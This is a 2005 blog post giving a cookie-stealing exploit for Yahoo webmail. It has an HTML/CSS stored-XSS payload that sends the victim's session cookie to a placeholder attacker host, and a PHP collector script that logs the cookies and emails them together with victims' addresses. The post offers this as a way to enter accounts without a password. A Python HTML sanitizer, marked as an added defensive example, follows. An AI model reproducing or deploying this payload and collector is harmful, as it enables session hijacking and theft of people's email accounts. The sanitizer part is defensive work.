Yahoo exploit: no password needed
Once again, webmail services are facing security issues. This one has the same aim as before: connecting to an account without the user's password. This time Yahoo is vulnerable.
Code:
<DIV id=b style="VISIBILITY: hidden"> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://your-site-here.com/script.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>';" type=text/css> </STYLE> </DIV>
script.php:
Code:
<?
$file="cookie.log";
if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){
    $logcookie = $_REQUEST["cookie"];
    $logcookie = rawurldecode($logcookie);
    $logemail = $_REQUEST["id"];
    $logemail = rawurldecode($logemail);
    if (file_exists($file)) {
        $handle=fopen($file, "r+");
        $filecontence=fread($handle,filesize("$file"));
        fclose($handle);
    }
    $handle=fopen($file, "w");
    fwrite($handle, "$logemail - $logcookie\n$filecontence\n "); //Writing email address and cookie then the rest of the log
    fclose($handle);
    mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n");
}
header("Location: http://mail.yahoo.com");
?>
To protect yourself from it, make sure you click the logout link instead of just closing the browser window. Also, this only works in Internet Explorer, so use any other browser.
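The markup above depends on an onload handler on a STYLE element surviving in the displayed message. On the service side, an allowlist filter removes that path; the following Python sketch is an added example, not part of the original post and not Yahoo's filter, and the tag/attribute policy and the names MailSanitizer and sanitize are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Policy assumed for this example (not Yahoo's actual filter).
ALLOWED_TAGS = {"a", "b", "i", "p", "br", "div", "span", "ul", "ol", "li"}
ALLOWED_ATTRS = {"href", "title"}          # no style=, no id=, no on* handlers
DROP_WITH_CONTENT = {"script", "style"}    # remove the element and its text
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings, self.open_tags = [], [], []
        self.skip = 0  # >0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        self.findings += [f"event handler {n} on <{tag}>" for n, _ in attrs if n.startswith("on")]
        self.skip += tag in DROP_WITH_CONTENT  # True counts as 1
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            value = (value or "").strip()
            if name in ALLOWED_ATTRS and (name != "href" or value.lower().startswith(SAFE_SCHEMES)):
                kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and self.open_tags and self.open_tags[-1] == tag:
            self.out.append(f"</{self.open_tags.pop()}>")  # never emit a stray close tag

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))

def sanitize(html_body):
    p = MailSanitizer()
    p.feed(html_body)
    p.close()
    p.out.extend(f"</{t}>" for t in reversed(p.open_tags))  # close what the sender left open
    return "".join(p.out), p.findings

# Constructed sample shaped like the markup above; html.parser lowercases STYLE/onload.
SAMPLE = '<DIV id=b style="VISIBILITY: hidden"><STYLE onload="window.status=\'\'" type=text/css></STYLE></DIV>Hi'
print(sanitize(SAMPLE))
```

The findings list is meant for logging or alerting on messages that carried handlers, while the returned markup is what would be rendered.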
Filed under: Security - @ December 12, 2005 6:10 am